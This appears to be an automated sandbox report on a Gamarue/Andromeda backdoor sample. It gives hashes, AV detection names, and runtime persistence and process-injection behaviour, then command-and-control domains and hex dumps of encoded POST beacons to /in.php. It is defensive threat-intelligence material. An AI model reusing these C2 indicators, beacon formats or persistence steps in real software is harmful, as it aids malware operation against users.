Analysis Date2015-09-15 22:24:02
MD53af74de9efe4ba7e784d1969ad457841
SHA134ef329b4d5e29acad3457fbc6c4dac147b5f250

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: 7ac2784970ab9d04202ac01bdfa69746 sha1: 2fedb5d47918a2eebad52cee6b96882465dfeab8 size: 8704
Section.rdata md5: d50d3815004d38d2cdc0b0d88a71fbc5 sha1: caceb663f5063436117bcc34b8df563e620a47bb size: 512
Section.data md5: 42910592ddb0f71f40abd178efd15d2c sha1: 4d19879529d21fc506c91764061509a8979fbfd8 size: 512
Section.rsrc md5: 8ffb9f6486c4337cf6e6b79190fa1bce sha1: 268322e38da96f45b1ea2ea01887bf898c3e079b size: 83968
Timestamp2013-04-02 18:28:18
VersionLegalCopyright: Copyright Mamuze© 2013
InternalName: Travka
FileVersion: 1, 3, 4, 7
CompanyName: House
PrivateBuild: Rainbow
LegalTrademarks: Fioka©"
Comments: Praslin
ProductName: Sunce
SpecialBuild: Kotlina
ProductVersion: 3, 0, 0, 0
FileDescription: Marko
OriginalFilename: Voda.exe
PackerBorland Delphi 3.0 (???)
PEhash6a0b9c9f0710faa5b346685ad21974942db97fc1
IMPhashed48b82f1a1eb22a69de1e774d2f8905
AVRisingno_virus
AVCA (E-Trust Ino)Win32/Gamarue.LE
AVF-SecureGen:Variant.Kazy.160852
AVDr. WebBackDoor.Andromeda.22
AVClamAVno_virus
AVArcabit (arcavir)Gen:Variant.Kazy.160852
AVBullGuardGen:Variant.Kazy.160852
AVPadvishWorm.Win32.Gamarue.I1
AVVirusBlokAda (vba32)BScope.Trojan.MSA.5417
AVCAT (quickheal)Worm.Gamarue.B
AVTrend Microno_virus
AVKasperskyTrojan.Win32.Generic
AVZillya!Downloader.Andromeda.Win32.2733
AVEmsisoftGen:Variant.Kazy.160852
AVIkarusWorm.Win32.Gamarue
AVFrisk (f-prot)W32/Trojan2.OCMB
AVAuthentiumW32/Trojan.FKAQ-2289
AVMalwareBytesTrojan.Bot.RV
AVMicroWorld (escan)Gen:Variant.Kazy.160852
AVMicrosoft Security EssentialsVirTool:Win32/Obfuscator.AGA
AVK7Trojan-Downloader ( 0039179f1 )
AVBitDefenderGen:Variant.Kazy.160852
AVFortinetW32/Injector.AFHI!tr
AVSymantecTrojan.Gen
AVGrisoft (avg)SHeur4.BFHZ
AVEset (nod32)Win32/TrojanDownloader.Wauchos.A
AVAlwil (avast)FoldRun-F [Trj]
AVAd-AwareGen:Variant.Kazy.160852
AVTwisterTrojan.C9D300786EA41CFE
AVAvira (antivir)TR/Dldr.Andromeda.tze
AVMcafeePWS-FAVD!3AF74DE9EFE4

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates ProcessC:\malware.exe

Process
↳ C:\malware.exe

Creates ProcessC:\WINDOWS\system32\wuauclt.exe

Process
↳ C:\WINDOWS\system32\wuauclt.exe

RegistryHKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\Policies\Explorer\Run\36874 ➝
C:\Documents and Settings\All Users\Local Settings\Temp\msoanr.cmd\\x00
Creates FilePIPE\lsarpc
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\All Users\Local Settings\Temp\msoanr.cmd
Deletes FileC:\34EF32~1.EXE
Creates Mutex3227095050

Network Details:

DNSwww.update.microsoft.com.nsatc.net
Type: A
191.232.80.55
DNSwww.update.microsoft.com.nsatc.net
Type: A
65.55.50.189
DNSxdqzpbcgrvkj.ru
Type: A
195.22.26.252
DNSxdqzpbcgrvkj.ru
Type: A
195.22.26.253
DNSxdqzpbcgrvkj.ru
Type: A
195.22.26.254
DNSxdqzpbcgrvkj.ru
Type: A
195.22.26.231
DNSanam0rph.su
Type: A
195.22.26.252
DNSanam0rph.su
Type: A
195.22.26.253
DNSanam0rph.su
Type: A
195.22.26.254
DNSanam0rph.su
Type: A
195.22.26.231
DNSwww.update.microsoft.com
Type: A
DNSorzdwjtvmein.in
Type: A
HTTP POSThttp://xdqzpbcgrvkj.ru/in.php
User-Agent: Mozilla/4.0
HTTP POSThttp://anam0rph.su/in.php
User-Agent: Mozilla/4.0
Flows TCP192.168.1.1:1031 ➝ 191.232.80.55:80
Flows UDP192.168.1.1:1032 ➝ 8.8.4.4:53
Flows TCP192.168.1.1:1033 ➝ 195.22.26.252:80
Flows UDP192.168.1.1:1034 ➝ 8.8.4.4:53
Flows TCP192.168.1.1:1035 ➝ 195.22.26.252:80
Flows UDP192.168.1.1:1036 ➝ 8.8.4.4:53

Raw Pcap
0x00000000 (00000)   504f5354 202f696e 2e706870 20485454   POST /in.php HTT
0x00000010 (00016)   502f312e 310d0a48 6f73743a 20786471   P/1.1..Host: xdq
0x00000020 (00032)   7a706263 6772766b 6a2e7275 0d0a5573   zpbcgrvkj.ru..Us
0x00000030 (00048)   65722d41 67656e74 3a204d6f 7a696c6c   er-Agent: Mozill
0x00000040 (00064)   612f342e 300d0a43 6f6e7465 6e742d54   a/4.0..Content-T
0x00000050 (00080)   7970653a 20617070 6c696361 74696f6e   ype: application
0x00000060 (00096)   2f782d77 77772d66 6f726d2d 75726c65   /x-www-form-urle
0x00000070 (00112)   6e636f64 65640d0a 436f6e74 656e742d   ncoded..Content-
0x00000080 (00128)   4c656e67 74683a20 38340d0a 436f6e6e   Length: 84..Conn
0x00000090 (00144)   65637469 6f6e3a20 636c6f73 650d0a0d   ection: close...
0x000000a0 (00160)   0a757071 63684373 38764654 4b464f56   .upqchCs8vFTKFOV
0x000000b0 (00176)   6d6e494b 47497769 4c72486f 33567436   mnIKGIwiLrHo3Vt6
0x000000c0 (00192)   38543379 71766851 75325471 6574516e   8T3yqvhQu2TqetQn
0x000000d0 (00208)   33714979 37513662 70546644 55745949   3qIy7Q6bpTfDUtYI
0x000000e0 (00224)   66745a33 334e4230 444c7730 67396d59   ftZ33NB0DLw0g9mY
0x000000f0 (00240)   3371773d 3d                           3qw==

0x00000000 (00000)   504f5354 202f696e 2e706870 20485454   POST /in.php HTT
0x00000010 (00016)   502f312e 310d0a48 6f73743a 20616e61   P/1.1..Host: ana
0x00000020 (00032)   6d307270 682e7375 0d0a5573 65722d41   m0rph.su..User-A
0x00000030 (00048)   67656e74 3a204d6f 7a696c6c 612f342e   gent: Mozilla/4.
0x00000040 (00064)   300d0a43 6f6e7465 6e742d54 7970653a   0..Content-Type:
0x00000050 (00080)   20617070 6c696361 74696f6e 2f782d77    application/x-w
0x00000060 (00096)   77772d66 6f726d2d 75726c65 6e636f64   ww-form-urlencod
0x00000070 (00112)   65640d0a 436f6e74 656e742d 4c656e67   ed..Content-Leng
0x00000080 (00128)   74683a20 38340d0a 436f6e6e 65637469   th: 84..Connecti
0x00000090 (00144)   6f6e3a20 636c6f73 650d0a0d 0a757071   on: close....upq
0x000000a0 (00160)   63684373 38764654 4b464f56 6d6e494b   chCs8vFTKFOVmnIK
0x000000b0 (00176)   47497769 4c72486f 33567436 38543379   GIwiLrHo3Vt68T3y
0x000000c0 (00192)   71766851 75325471 6574516e 33714979   qvhQu2TqetQn3qIy
0x000000d0 (00208)   37513662 70546644 55745949 66745a33   7Q6bpTfDUtYIftZ3
0x000000e0 (00224)   334e4230 444c7730 67396d59 3371773d   3NB0DLw0g9mY3qw=
0x000000f0 (00240)   3d71773d 3d                           =qw==


Strings